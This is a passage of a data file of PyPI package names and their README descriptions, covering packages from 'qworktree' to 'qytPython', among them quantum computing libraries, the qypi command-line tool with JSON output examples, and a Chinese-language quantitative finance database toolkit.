[\n\"depend_worktree_lib1_name\",\n\"depend_worktree_lib2_name\"\n\t]3: Create a file in your worktree with the dependency property:folderName/dependencies.priINCLUDEPATH += $$PWD\nLIBS *= -llibraryName4: Import the library elements:load(root_directory.prf)\n # request include properties\n include($$ROOT_DIRETORY/$$LIB_DECLARE_DEPENDENCIES_FOLDERNAME1)\n include($$ROOT_DIRETORY/$$LIB_DECLARE_DEPENDENCIES_MYLIB2)Note that the define is generate in the filedefines.prfLicense (MPL v2.0)Copyright qworktree Edouard DUPINLicensed under the Mozilla Public License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License athttps://www.mozilla.org/MPL/2.0/Unless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License."} +{"package": "qwota", "pacakge-description": "Quickly check AppliedClusterResourceQuota.Login to a cluster on the command line using kubectl/oc then run qwota."} +{"package": "qwq-package", "pacakge-description": "Summing two numbers by addition"} +{"package": "qx", "pacakge-description": "quickxorA tool and file format for encoding and decoding data with an ASCII key"} +{"package": "qx-aliyun-sms", "pacakge-description": "No description available on PyPI."} +{"package": "qxbranch.quantum-feature-detector", "pacakge-description": "OverviewQxBranch\u2019s Quantum Feature Detector (QxQFD) is a Python library providing a configurable class of quantum machine\nlearning functions. It provides a simple interface for using quantum transformations to detect features in data as part\nof a machine learning application stack, on Rigetti\u2019s QCS.RequirementsQxQFD requires the following Python packages:Python 3.6Pyquil 2.0.0numpymatplotlibscikit-learnnetworkxQxQFD officially supports Linux 18.04.UsageQxQFD can be used with a Rigetti Forest QMI, or a local machine running the Forest SDK QVM.Included with QxQFD are three demonstration notebooks providing examples of the library\u2019s use. They can be found in the\n\u2018demo\u2019 folder. The CIFAR-10 data required for the third notebook can be found athttps://www.cs.toronto.edu/~kriz/cifar.html.DocumentationComplete documentation is available on QxBranch\u2019s website athttps://www.qxbranch.com/manuals/quantum_feature_detector.At this address you can also find some demonstration iPython notebooks.About QxBranchQxBranch is a quantum computing and data analytics software company founded in 2014, based in Washington DC with offices\nin London, UK, and Adelaide, Australia. QxBranch specializes in the development of quantum computing software and data\nanalytics services. To learn more about QxBranch, visithttps://www.qxbranch.com.LicenseCopyright 2018 QxBranch, Inc.Licensed under the Apache License, Version 2.0 (the \u201cLicense\u201d);\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License athttps://www.apache.org/licenses/LICENSE-2.0Unless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \u201cAS IS\u201d BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License."} +{"package": "qxelarator", "pacakge-description": "QX SimulatorA universal quantum computer simulator. Allows simulation of a quantum circuit written incQasm.Runs as aPython moduleor an executable binary.For detailed documentation, please visitthe ReadTheDocs page, to find e.g.:installation instructionsusage.LicensingQX-simulator is licensed under the Apache License, Version 2.0. SeeLICENSEfor the full\nlicense text."} +{"package": "qxHello", "pacakge-description": "qx-hellogood first Python package to print your name."} +{"package": "qxm_nester", "pacakge-description": "UNKNOWN"} +{"package": "qx-ray", "pacakge-description": "/qx_ray"} +{"package": "qx-rest", "pacakge-description": "qx-rest PackageThis is a simple Phabrix Qx REST interface package."} +{"package": "qxxkey", "pacakge-description": "No description available on PyPI."} +{"package": "qy", "pacakge-description": "qy is queue"} +{"package": "qyaml-smartptr", "pacakge-description": "QYAML \u2014 query YAML with YAML with YAML resultWalk synchronously throughqueryanddoc, and print the list of matching branches ofdocas a YAML document.Result is printed to standard output as a list of found matches, including their keys.Givenfile.yaml:dict:first:value1second:value2QYAML may be used to query, for example, the value of thefirstkey of thedictdictionary:$qyaml\"dict: first\"] [] []Global Option-iURL,--index-urlURLQuery the Python package server at the given URL, which\nmust support both theXML-RPCandJSONAPIs. By\ndefault,qypiqueriesPyPI (Warehouse)athttps://pypi.org/pypi.List Packageslistqypi listList all packages registered on PyPI, one per line, in the order that they are\nreturned by the API.listandreadmeare the only subcommands that do\nnot output JSON.searchqypi search [--and|--or] [--packages|--releases] ...Search PyPI for packages or package releases matching the given search terms.\nSearch terms consist of a field name and a value separated by a colon; a term\nwithout a colon searches thedescriptionfield. As documentedhere, the supported\nsearchable fields are:nameversionauthorauthor_emailmaintainermaintainer_emailhome_page(aliases:homepageandurl)licensesummarydescription(aliases:long_descriptionandreadme)keywords(alias:keyword)platformdownload_urlAll other fields are ignored.Multiple search terms referring to the same field are combined with logical OR.\nSearch terms on different fields are combined according to whether--andor--oris specified on the command line; the default behavior is--and.By default,searchlists every matching release for every package, even if\nthe same package has multiple matching releases. To list no more than one\nrelease (specifically, the highest-versioned) per package, specify the-p/--packagesoption on the command line.-r/--releasesrestores the default behavior.browseqypi browse [-f|--file ] [--packages|--releases] ...List packages or package releases with the giventrove classifiers. Because trove\nclassifiers are not the most command-line friendly thing in the world, they may\noptionally be read from a file, one classifier per line. Any further\nclassifiers listed on the command line will be added to the file\u2019s list.By default,browselists every matching release for every package, even if\nthe same package has multiple matching releases. To list no more than one\nrelease (specifically, the highest-versioned) per package, specify the-p/--packagesoption on the command line.-r/--releasesrestores the default behavior.ownedqypi owned ...List packages owned or maintained by the given PyPI usersPackage Informationreleasesqypi releases ...List the released versions for the given packages in PEP 440 orderExample:$ qypi releases qypi\n{\n \"qypi\": [\n {\n \"is_prerelease\": false,\n \"release_date\": \"2017-04-02T03:07:42\",\n \"release_url\": \"https://pypi.org/project/qypi/0.1.0\",\n \"version\": \"0.1.0\"\n },\n {\n \"is_prerelease\": false,\n \"release_date\": \"2017-04-02T03:32:44\",\n \"release_url\": \"https://pypi.org/project/qypi/0.1.0.post1\",\n \"version\": \"0.1.0.post1\"\n }\n ]\n}A release\u2019s release date is the time at which its first file was uploaded. If\nthere are no files associated with a release, its release date will benull.ownerqypi owner ...List the PyPI users that own and/or maintain the given packagesExample:$ qypi owner requests\n{\n \"requests\": [\n {\n \"role\": \"Owner\",\n \"user\": \"graffatcolmingov\"\n },\n {\n \"role\": \"Owner\",\n \"user\": \"kennethreitz\"\n },\n {\n \"role\": \"Owner\",\n \"user\": \"Lukasa\"\n },\n {\n \"role\": \"Maintainer\",\n \"user\": \"graffatcolmingov\"\n },\n {\n \"role\": \"Maintainer\",\n \"user\": \"Lukasa\"\n },\n {\n \"role\": \"Maintainer\",\n \"user\": \"nateprewitt\"\n }\n ]\n}Release InformationThese subcommands show information about individual package releases/versions\nand share the same command-line options and argument syntax.Arguments of the formpackage==version(e.g.,qypi infoqypi==0.1.0)\nalways refer to the given version of the given package.Arguments that are just a package name refer to (by default) the\nhighest-numbered non-prerelease version of the package. This can be changed\nwith the following options:-A,--all-versionsShow information for all versions of each package (in\nPEP 440 order, excluding prereleases unless--preis given)--latest-versionShow information for only the latest version of each\npackage; this is the default--newestDefine \u201clatest version\u201d to mean the most recently\nreleased version. Release dates are based on file\nupload times; releases without file uploads are thus\nignored.--highestDefine \u201clatest version\u201d to mean the highest-numbered\nversion; this is the default.--preInclude prerelease & development versions--no-preDon\u2019t include prerelease & development versions; this\nis the default.infoqypi info [] [--description] [--trust-downloads] ...Show basic information about the given package releases.By default, (long) descriptions are omitted because they can beverylong,\nand it is recommended that you view them with thereadmesubcommand\ninstead; use the--descriptionoption to include them anyway.By default, download counts are omitted becausethe feature is currently\nbroken & unreliable; use the--trust-downloadsoption if you want to see the values anyway.Example:$ qypi info qypi\n[\n {\n \"bugtrack_url\": null,\n \"classifiers\": [\n \"Development Status :: 4 - Beta\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Information Technology\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3 :: Only\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n \"Topic :: System :: Software Distribution\"\n ],\n \"docs_url\": null,\n \"download_url\": null,\n \"keywords\": \"pypi warehouse search packages pip\",\n \"license\": \"MIT\",\n \"name\": \"qypi\",\n \"people\": [\n {\n \"email\": \"qypi@varonathe.org\",\n \"name\": \"John Thorvald Wodder II\",\n \"role\": \"author\"\n }\n ],\n \"platform\": null,\n \"project_url\": \"https://pypi.org/project/qypi/\",\n \"release_date\": \"2017-04-02T03:32:44\",\n \"release_url\": \"https://pypi.org/project/qypi/0.1.0.post1/\",\n \"requires_python\": \"~=3.4\",\n \"summary\": \"Query PyPI from the command line\",\n \"url\": \"https://github.com/jwodder/qypi\",\n \"version\": \"0.1.0.post1\"\n }\n]readmeqypi readme [] ...Display the given package releases\u2019 (long) descriptions in a pager one at a\ntime.listandreadmeare the only subcommands that do not output\nJSON.filesqypi files [] [--trust-downloads] ...List files available for download for the given package releases. Download\ncounts are omitted becausethe feature is currently broken & unreliable; use the--trust-downloadsoption if you want to see the values anyway.Example:$ qypi files qypi\n[\n {\n \"files\": [\n {\n \"comment_text\": \"\",\n \"digests\": {\n \"md5\": \"58863d77e19bf4aa1ae85026cc1ff0f6\",\n \"sha256\": \"5946a4557550479af90278e5418cd2c32a2626936075078a4c7096be52d43078\"\n },\n \"filename\": \"qypi-0.1.0.post1-py3-none-any.whl\",\n \"has_sig\": true,\n \"md5_digest\": \"58863d77e19bf4aa1ae85026cc1ff0f6\",\n \"packagetype\": \"bdist_wheel\",\n \"python_version\": \"py3\",\n \"size\": 13590,\n \"upload_time\": \"2017-04-02T03:32:44\",\n \"url\": \"https://files.pythonhosted.org/packages/f9/3f/6b184713e79da15cd451f0dab91864633175242f4d321df0cacdd2dc8300/qypi-0.1.0.post1-py3-none-any.whl\"\n },\n {\n \"comment_text\": \"\",\n \"digests\": {\n \"md5\": \"bfd357b3df2c2f1cbb6d23ff7c61fbb9\",\n \"sha256\": \"c99eea315455cf9fde722599ab67eeefdff5c184bb3861a7fd82f8a9387c252d\"\n },\n \"filename\": \"qypi-0.1.0.post1.tar.gz\",\n \"has_sig\": true,\n \"md5_digest\": \"bfd357b3df2c2f1cbb6d23ff7c61fbb9\",\n \"packagetype\": \"sdist\",\n \"python_version\": \"source\",\n \"size\": 8975,\n \"upload_time\": \"2017-04-02T03:32:46\",\n \"url\": \"https://files.pythonhosted.org/packages/0e/49/3056ee68b44c8eab4d4698b52ae4d18c0db92c80abc312894c02c4722621/qypi-0.1.0.post1.tar.gz\"\n }\n ],\n \"name\": \"qypi\",\n \"version\": \"0.1.0.post1\"\n }\n]"} +{"package": "qyrm-pipinject", "pacakge-description": "No description available on PyPI."} +{"package": "qyrm-pipinject1", "pacakge-description": "No description available on PyPI."} +{"package": "qyrm-pipinject2", "pacakge-description": "No description available on PyPI."} +{"package": "qyrm-pipinject3", "pacakge-description": "No description available on PyPI."} +{"package": "qyrm-pipinject4", "pacakge-description": "No description available on PyPI."} +{"package": "qytang_devnet", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qyt_devnet", "pacakge-description": "No description available on PyPI."} +{"package": "qython", "pacakge-description": "UNKNOWN"} +{"package": "qytools", "pacakge-description": "\ud83d\udce6 qytools\u6587\u4ef6\u5185\u5bb9db_read.py\u6570\u636e\u5e93\u53d6\u51fa\u6570\u636edb_maintain.py\u6570\u636e\u5e93\u5f55\u5165\u6570\u636etools.py\u6570\u636e\u5e93/\u56e0\u5b50\u6784\u9020\u76f8\u5173\u5b9e\u7528\u5de5\u5177\u5305stack.py\u5806\u6808\u524d\u8a00\u64cd\u4f5c\u4e2d\u8d22\u91cf\u5316\u7814\u7a76\u9662\u6240\u62e5\u6709\u7684\u5168\u90e8sqlite3\u6570\u636e\u5e93\uff0c\u5177\u4f53\u64cd\u4f5c\u89c1\u4e0b\u9762\u76f8\u5173\u6587\u4ef6\u63cf\u8ff0\u6bd4\u5e38\u89c4select\u8bed\u53e5\u901f\u5ea6\u9ad8\u51fa\u6570\u500d~\u6570\u5341\u500d\uff0c\u6570\u636e\u91cf\u8d8a\u5927\u63d0\u5347\u901f\u5ea6\u8d8a\u660e\u663e\u4ec5\u4f9b\u4e2d\u8d22\u91cf\u5316\u7814\u7a76\u9662\u6210\u5458\u5b66\u4e60\u4f7f\u7528dbread\u91c7\u53d6\u5185\u7f6e\u6587\u6863\u7684\u5f62\u5f0f\uff0c\u5bf9\u63a5\u53e3\u4f7f\u7528\u6709\u7591\u95ee\u53ef\u4ee5\u76f4\u63a5\u53c2\u8003README+\u5185\u7f6e\u6587\u6863\u4f5c\u8005qytools\u00a9yulin qiu, Released under theMITLicense.qq: 492876854Weixin: QQ492876854e-mail:x492876854@qq.com\u73af\u5883\u51c6\u5907pipreqs==0.4.10pandas>=1.0.1numpy>=1.16.2tushare>=1.2.52\u4f7f\u7528\u51c6\u5907dbread\u63a5\u53e3\u529f\u80fd\u9700\u8981\u4f7f\u7528tushare\uff0c\u9700\u8981\u786e\u4fdd\u672c\u673a\u62e5\u6709tushare\u5305\u5e76\u4e14\u5df2\u7ecf\u6267\u884c\u8fc7set_token\u5c3d\u91cf\u786e\u4fddtushare\u62e5\u6709200\u4ee5\u4e0a\u79ef\u5206\uff0c\u6216\u8005\u5165tushare\u5b98\u65b9\u7fa4\u8054\u7cfb\u7ba1\u7406\u5458\u5b66\u751f\u53ef\u4ee5\u62e5\u6709\u514d\u8d39\u4f7f\u7528\u6743\u9650\u9996\u6b21\u4f7f\u7528tushare\u9700\u8981\u6839\u636e\u5b98\u7f51\u6307\u793a\u8bbe\u7f6etoken200\u4ee5\u4e0a\u79ef\u5206\uff0c\u6216\u8005\u5165tushare\u5b98\u65b9\u7fa4\u8054\u7cfb\u7ba1\u7406\u5458\u5426\u5219qytools\u90e8\u5206\u529f\u80fd\u65e0\u6cd5\u4f7f\u7528\uff0c\u4e4b\u540e\u5168\u5c40\u6709\u6548\uff0c\u65e0\u9700\u8bbe\u7f6e\u6587\u4ef6\u6587\u6863db_read.py\u57fa\u4e8e\u80a1\u7968sqlite\u6570\u636e\u5e93\u7684\u901a\u7528\u578b\u63a5\u53e3class: DbReader\uff0c\u4f7f\u7528\u6d41\u7a0bfrom qyltools import Dbreader\u9996\u6b21\u4f7f\u7528\u65f6\u9884\u5148\u6267\u884c\u4e00\u6b21\uff0c\u6267\u884c\u6210\u529f\u540e\u7565\u8fc7\uff0c\u8fdb\u884c\u6b65\u9aa43\uff08\u7c7b\u4f3ctushare set_token\uff09\uff1aDbreader.firsttime_setconfig(sqlite3\u6570\u636e\u6587\u4ef6\u5b58\u653e\u76ee\u5f55)\u4f8b\u5982\uff1aDbreader.firsttime_setconfig(r'D:\\learn\\navicat\\data'\uff09read = Dbreaderread.read_ts_day_data(\u53c2\u6570)\u4e3b\u8981\u62e5\u6709\u4ee5\u4e0b\u529f\u80fd\u8bfb\u53d6\u6570\u636e\u7c7bread_tdx_1min_data\u83b7\u53d6\u5206\u949f\u6570\u636eread_ts_top_inst\u83b7\u53d6\u9f99\u864e\u699c\u673a\u6784\u660e\u7ec6read_ts_top_list\u83b7\u53d6\u9f99\u864e\u699c\u80a1\u7968\u660e\u7ec6read_ts_day_data\u83b7\u53d6\u65e5\u7ebf\u7efc\u5408\u6570\u636eread_ts_index_daily\u83b7\u53d6\u6307\u6570\u65e5\u7ebf\u6570\u636eread_ts_limit_list\u83b7\u53d6\u6bcf\u65e5\u6da8\u505c\u677f\u6570\u636eread_ts_moneyflow_hsgt\u83b7\u53d6\u6caa\u6df1\u6e2f\u901a\u8d44\u91d1\u6d41\u6570\u636eread_concept_data\u83b7\u53d6\u677f\u5757\u4fe1\u606fread_jj_1min_index_data\u83b7\u53d6\u6307\u6570\u5206\u949f\u6570\u636e\uff08\u6398\u91d1\u6570\u636e\u6e90\uff09read_fundamentals\u83b7\u53d6\u80a1\u7968\u516c\u53f8\u8d22\u52a1\u6570\u636eread_strategy\u83b7\u53d6AI\u7b56\u7565\u56e0\u5b50\u8868read_cal_market_1min_data\u83b7\u53d6\u8ba1\u7b97\u56e0\u5b50\u8868query_stock_day\u901a\u7528\u578b\u80a1\u7968\u65e5\u7ebf\u6570\u636e\u8868\u63a5\u53e3query_stock_min\u901a\u7528\u578b\u80a1\u7968\u5206\u949f\u6570\u636e\u8868\u63a5\u53e3query_index_day\u901a\u7528\u578b\u6307\u6570\u65e5\u7ebf\u6570\u636e\u8868\u63a5\u53e3query_index_min\u901a\u7528\u578b\u6307\u6570\u5206\u949f\u6570\u636e\u8868\u63a5\u53e3query_market_min\u901a\u7528\u578b\u5e02\u573a\u5206\u949f\u6570\u636e\u8868\u63a5\u53e3query_market_day\u901a\u7528\u578b\u5e02\u573a\u65e5\u7ebf\u6570\u636e\u8868\u63a5\u53e3query_stock_limitday\u83b7\u53d6\u80a1\u7968\u6307\u5b9a\u65f6\u95f4\u957f\u5ea6\u7684\u65e5\u7ebf\u6570\u636e\u63a5\u53e3\uff08\u5904\u7406\u505c\u724c\u80a1\u4e13\u7528\uff09\u4e3b\u8981\u53c2\u6570\u8bf4\u660estart\u2013 \u5f00\u59cb\u65e5\u671f\uff0c\u5fc5\u9009\uff0c\u652f\u6301int(20180808), datetime('2018-08-08 00:00:00'), str('20180808')end\u2013 \u7ed3\u675f\u65e5\u671f \uff0c\u5fc5\u9009\uff0c\u652f\u6301\u540cstartfields\u2013 \u8981\u4ece\u5e93\u4e2d\u53d6\u51fa\u7684\u5217\u540d,\u9ed8\u8ba4\u53d6\u6240\u6709\uff0c\u652f\u6301str\u548clist[str]\uff0c\u4f8b\u5982'code,high', ['code','high']code\u2013 \u4ee3\u7801\uff0c\u9ed8\u8ba4\u53d6\u6240\u6709\uff0c\u652f\u6301int\u5982300, list\u5982[1, '300', 399905]\u5217\u8868\u5185\u53ef\u4ee5\u662f\u6570\u503c\u6216strshift\u2013 \u5f80\u524d\u63a8\u7684\u65f6\u95f4\uff0c\u9ed8\u8ba40\uff0c\u4ec5\u652f\u6301intforward\u2013 \u5f80\u540e\u63a8\u7684\u65f6\u95f4\uff0c\u9ed8\u8ba40\uff0c\u4ec5\u652f\u6301intnewdrop\u2013 \u65b0\u80a1\u4e0a\u5e02\u591a\u5c11\u4ea4\u6613\u65e5\u5185\u4e0d\u4ea4\u6613\uff0c\u9ed8\u8ba40\uff0c\u4ec5\u652f\u6301intstdrop\u2013 \u662f\u5426\u5254\u9664st\u80a1\uff0cTrue\u5254\u9664\uff0c\u9ed8\u8ba4Truedeldrop\u2013 \u662f\u5426\u5254\u9664\u9000\u5e02\u80a1\uff0cTrue\u5254\u9664\uff0c\u9ed8\u8ba4Falsestardrop\u2013 \u662f\u5426\u5254\u9664\u79d1\u521b\u677f\u80a1\uff0cTrue\u5254\u9664\uff0c\u9ed8\u8ba4Truetime_start\u2013 \u5206\u949f\u6570\u636e\u7684\u53ef\u9009\u53c2\u6570\uff0c\u5f00\u59cb\u65f6\u95f4\uff0c\u9ed8\u8ba4None\uff0c\u652f\u6301str\u5982'09:35:30'time_end\u2013 \u5206\u949f\u6570\u636e\u7684\u53ef\u9009\u53c2\u6570\uff0c\u7ed3\u675f\u65f6\u95f4\uff0c\u9ed8\u8ba4None\uff0c\u652f\u6301str\u5982'09:35:30'tablename\u2013 \u67e5\u8be2\u8868\u540d\uff0cstr\u7c7b\u578bdbname\u2013 \u6570\u636e\u5e93\u540d\uff0cstr\u7c7b\u578b\uff0c\u540e\u7f00\u53ef\u52a0\u53ef\u4e0d\u52a0\uff0c\u5982test\u6216test.sqlite3\u5747\u5408\u6cd5\u8fd4\u56de\u503c\u4e3adataframe\u683c\u5f0f\u6570\u636e\u8868.\u793a\u4f8b1\uff1a[In]: read.read_ts_day_data(start='20200313', end=20200313, forward=1, shift=1, newdrop=60) # \u53c2\u6570\u89c1\u6587\u6863\uff08ctrl+Q\uff09\n \n [Out]:\n id code date ... up_limit vol volume_ratio\n 10575 1753771 603998 2020-03-13 ... 7.67 59193.06 1.01\n 10576 1757673 603998 2020-03-16 ... 7.45 65566.00 1.11\n 10577 1751490 603999 2020-03-12 ... 7.12 94223.01 1.06\n 10578 1755746 603999 2020-03-13 ... 6.89 112777.40 1.29\n 10579 1756595 603999 2020-03-16 ... 6.64 83763.32 0.89\n [5 rows x 42 columns]\u793a\u4f8b2\uff1a[In]: query_index_min(start=20200402, end=20200402, tablename='jj_1min_index_data', dbname='jj_data')\n \n [Out]: \n code date ... volume datetime\n 1915 399006 2020-04-02 ... 17922320.0 2020-04-02 14:56:00\n 1916 399006 2020-04-02 ... 16854299.0 2020-04-02 14:57:00\n 1917 399006 2020-04-02 ... 1227189.0 2020-04-02 14:58:00\n 1918 399006 2020-04-02 ... 0.0 2020-04-02 14:59:00\n 1919 399006 2020-04-02 ... 33783690.0 2020-04-02 15:00:00\n [5 rows x 10 columns]\u5de5\u5177\u7bb1get_tableinfo_cols\u83b7\u53d6\u67d0\u4e2a\u6570\u636e\u5e93\u67d0\u4e2a\u8868\u7684\u6240\u6709\u5217\u540dcheck_time\u4fee\u6b63\u65f6\u95f4\u683c\u5f0f\uff0c\u8f93\u5165strintdatetime\u7edf\u4e00\u53d8\u4e3astr: '2018-09-08'\u578bget_timesection\u83b7\u53d6\u6307\u5b9a\u8d77\u6b62\u65e5\u671f\u7684\u4ea4\u6613\u65e5\u5386\u793a\u4f8b1\uff1a[In]: read.get_timesection(start='20200313', end=20200315, shift=5) # shift\u4e3a\u53c2\u6570\uff0c\u53d6\u524dn\u4ea4\u6613\u65e5 \n \n [Out]: \n ['2020-03-06', '2020-03-09', '2020-03-10', '2020-03-11', '2020-03-12', '2020-03-13']get_opendate\u67e5\u627e\u6307\u5b9a\u65f6\u95f4\u9644\u8fd1\u7684\u4ea4\u6613\u65e5\u793a\u4f8b2\uff1a[In]: read.get_opendate(time=20200315, shift=1) # shift\u4e3a\u53c2\u6570\uff0c\u53d6\u524dn\u4ea4\u6613\u65e5`\n \n [Out]:\n `2020-03-13db_maintain.py\u6ce8\u610f\u4e8b\u9879\u4f7f\u7528db_maintain.py\u53ea\u9700\u8981\u4e86\u89e3\u6700\u57fa\u7840\u7684sql\u8bed\u6cd5\u542b\u4e49\u5373\u53ef\u4f7f\u7528\uff0c\u5982\u6709\u7591\u95ee\uff0c\u53c2\u8003sql\u8bed\u6cd5\u6587\u6863\u63a5\u53e3db_maintain.py\u6587\u4ef6\u91cc\u5747\u6709\u4e3b\u8981\u529f\u80fd\u7684\u8be6\u7ec6\u53c2\u6570\u8bf4\u660e\uff0c\u53ef\u4ee5\u901a\u8fc7main\u91cc\u7684\u793a\u4f8b\uff0c\u5bf9\u4e0a\u8ff04\u4e2a\u529f\u80fdctrl+\u9f20\u6807\u5de6\u952e\u6216Ctrl+Q\u67e5\u770b\u57fa\u672c\u529f\u80fd\u5305\u62ec4\u4e2a:update_datareplace_datarebuild_datainsert_data\u4e0b\u9762\u9010\u4e00\u4ecb\u7ecdupdate_data\u6b64\u63a5\u53e3\u638c\u7ba1\u6570\u636e\u66f4\u65b0\uff0c\u4e0esql\u4e2d\u7684update\u542b\u4e49\u7c7b\u4f3c\uff0c\u5c06\u539f\u6765\u8868\u7684\u67d0\u4e9b\u5df2\u6709\u6570\u636e\u66f4\u65b0\uff0c\u6bd4\u5982\u5c06test\u8868\u4e2d2018\u5e7410\u670815\u65e5\u523016\u65e5\u7684volume\u6539\u53d8\u4e3a\u8f93\u5165df\u4e2d\u7684\u5bf9\u5e94\u503c\uff0c\u76f8\u6bd4sql\u8bed\u53e5\u7684update\uff0c\u76f4\u63a5\u989d\u5916\u6dfb\u52a0\u5217\uff0c\u4ee5\u53ca\u81ea\u52a8\u88c1\u526a\u91cd\u590d\u6570\u636e\u793a\u4f8b\uff1afactor.update_data(\n dbpath='D/fundamentals.sqlite3', tablename='test',\n newcols={'circ_mv': 'real'}, df_data=df, index_col='code,date', autoadd=True)\u4e0a\u8ff0\u4ee3\u7801\u57fa\u672c\u542b\u4e49\u4e3a\uff1a\u5728D\u76d8\u66f4\u65b0fundamental\u6570\u636e\u5e93\u4e2d\u7684test\u8868\uff0c\u65b0\u589e\u4e00\u5217circ_mv\u4e14\u5b9a\u4e49\u683c\u5f0f\u4e3areal\uff0c\n\u4f20\u5165\u7684dataframe\u4e3adf\uff0ctest\u8868\u7684\u7d22\u5f15\u4e3acode,date\uff0cautoadd\u6253\u5f00\u5219\u5269\u4f59\u672a\u50cfcirc_mv\u5b9a\u4e49\u4e3areal\u7684\u989d\u5916\u5217\n\uff08df\u6709\u800c\u6570\u636e\u5e93\u6ca1\u6709\u7684\u5217\uff09\u5c06\u6309\u7167sqlite\u9ed8\u8ba4\u683c\u5f0f\u5165\u5e93\u4f7f\u7528\u573a\u666f\uff1a\u67d0\u6bb5\u65f6\u95f4\u533a\u95f4\u7684\u67d0\u51e0\u5217\u6570\u636e\u6709\u95ee\u9898\uff0c\u91cd\u65b0\u5165\u5e93\u5bf9\u5e94\u51e0\u5217\u65f6\u4f7f\u7528replace_data\u6b64\u63a5\u53e3\u638c\u7ba1\u6570\u636e\u8868\u5b8c\u5168\u66ff\u6362\uff0c\u8c28\u614e\u4f7f\u7528\uff0c\u4f7f\u7528\u540e\u539f\u8868\u4f1a\u5220\u9664\uff0c\u64cd\u4f5c\u548cupdate\u5927\u4f53\u4e00\u81f4\uff0c\u989d\u5916\u591a\u53c2\u6570index_name\uff0c\u4e3a\u66ff\u6362\u540e\u65b0\u8868\u7684\u521b\u5efa\u7684\u7d22\u5f15\u540d\u79f0\u5982'index_b1'\u4f7f\u7528\u573a\u666f\uff1a\u6574\u4e2a\u8868\u8fc7\u4e8e\u8001\u65e7\u6216\u51fa\u4e8e\u5176\u4ed6\u539f\u56e0\u8981\u6574\u8868\u66ff\u6362\u65f6\u4f7f\u7528rebuild_data\u6b64\u63a5\u53e3\u638c\u7ba1\u5df2\u6709\u6570\u636e\u7684\u66ff\u6362\uff0c\u76f8\u5bf9\u4e8ereplace\u66f4\u4e3a\u6e29\u548c\uff0c\u76f8\u5bf9\u4e8eupdate\u66f4\u4e3a\u6fc0\u8fdb\uff0c\u662f\u5728\u539f\u8868\u57fa\u7840\u4e0a\u4fee\u6539\u4e00\u90e8\u5206\u6570\u636e\uff0c\u4f46\u662f\u662f\u6309\u7167\u65f6\u95f4\u533a\u95f4\uff0c\u8d77\u59cb\u65f6\u95f4\u5230\u7ec8\u6b62\u65f6\u95f4\u7684\u6240\u6709\u6570\u636e\u4f1a\u88ab\u6e05\u7a7a\u540e\u91cd\u65b0\u5199\u5165\uff0c\u4e0d\u80fd\u6307\u5b9a\u67d0\u4e00\u5217\uff0c\u64cd\u4f5c\u65b9\u6cd5\u540cupdate\u4f7f\u7528\u573a\u666f\uff1a\u67d0\u6bb5\u65f6\u95f4\u533a\u95f4\u7684\u6570\u636e\u6574\u4f53\u6027\u5165\u9519\uff0c\u91cd\u65b0\u5165\u5e93\u65f6\u4f7f\u7528insert_data\u6b64\u63a5\u53e3\u638c\u7ba1\u6570\u636e\u63d2\u5165\uff0c\u4e0esql\u4e2d\u7684insert\u542b\u4e49\u7c7b\u4f3c\uff0c\u4f46\u662f\u76f8\u6bd4sql\u8bed\u53e5\uff0c\u8be5\u63a5\u53e3\u53ef\u4ee5\u989d\u5916\u6dfb\u52a0\u5217\uff0c\u4ee5\u53ca\u81ea\u52a8\u88c1\u526a\u548c\u5e93\u91cc\u91cd\u590d\u6570\u636e\uff0c\u64cd\u4f5c\u65b9\u5f0f\u4e0eupdate\u57fa\u672c\u4e00\u81f4,\u989d\u5916\u591a\u4e86insertmode\u53c2\u6570\uff0c\u8be6\u7ec6\u89e3\u91ca\u89c1db_maintain\u4f7f\u7528\u573a\u666f\uff1a\u6dfb\u52a0\u65b0\u6570\u636e\uff0c\u6bcf\u65e5\u66f4\u65b0\u6570\u636e\u5e93\u7b49creat_dbtable\u6b64\u63a5\u53e3\u638c\u7ba1\u5efa\u5e93\u5efa\u8868\u6216\u8005\u5728\u5df2\u5b58\u5728\u7684\u5e93\u91cc\u5efa\u8868\uff0c\u8be6\u7ec6\u89e3\u91ca\u89c1db_maintain\u4f7f\u7528\u573a\u666f\uff1a\u65b0\u5efa\u4e86\u6570\u636e\u5e93\u6216\u8005\u56e0\u5b50\u8868\uff0c\u7528\u4e8e\u4ed6\u4eba\u4f7f\u7528\u65f6\u65e0\u5e93\u5efa\u5e93\uff0c\u65e0\u8868\u5efa\u8868\uff0c\u4f7f\u5f97\u4f7f\u7528\u8005\u5b8c\u5168\u4e0d\u9700\u8981\u638c\u63e1\u6570\u636e\u5e93\u64cd\u4f5c\u5373\u53ef\u5b8c\u6210\u76f8\u5173\u9700\u6c42LicenseThis is free and unencumbered software released into the public domain.Anyone is free to copy, modify, publish, use, compile, sell, or\ndistribute this software, either in source code form or as a compiled\nbinary, for any purpose, commercial or non-commercial, and by any means."} +{"package": "qytorch", "pacakge-description": "qytorchQuaternion TorchA python library which has quaternion versions of some of the mostly used libraries in torch.nn. It supports all of the features of the supported layers. Main advantage of quaternion layers is that, it has only 1/4th the number of weights compared to it's real counterpart."} +{"package": "qytPython", "pacakge-description": 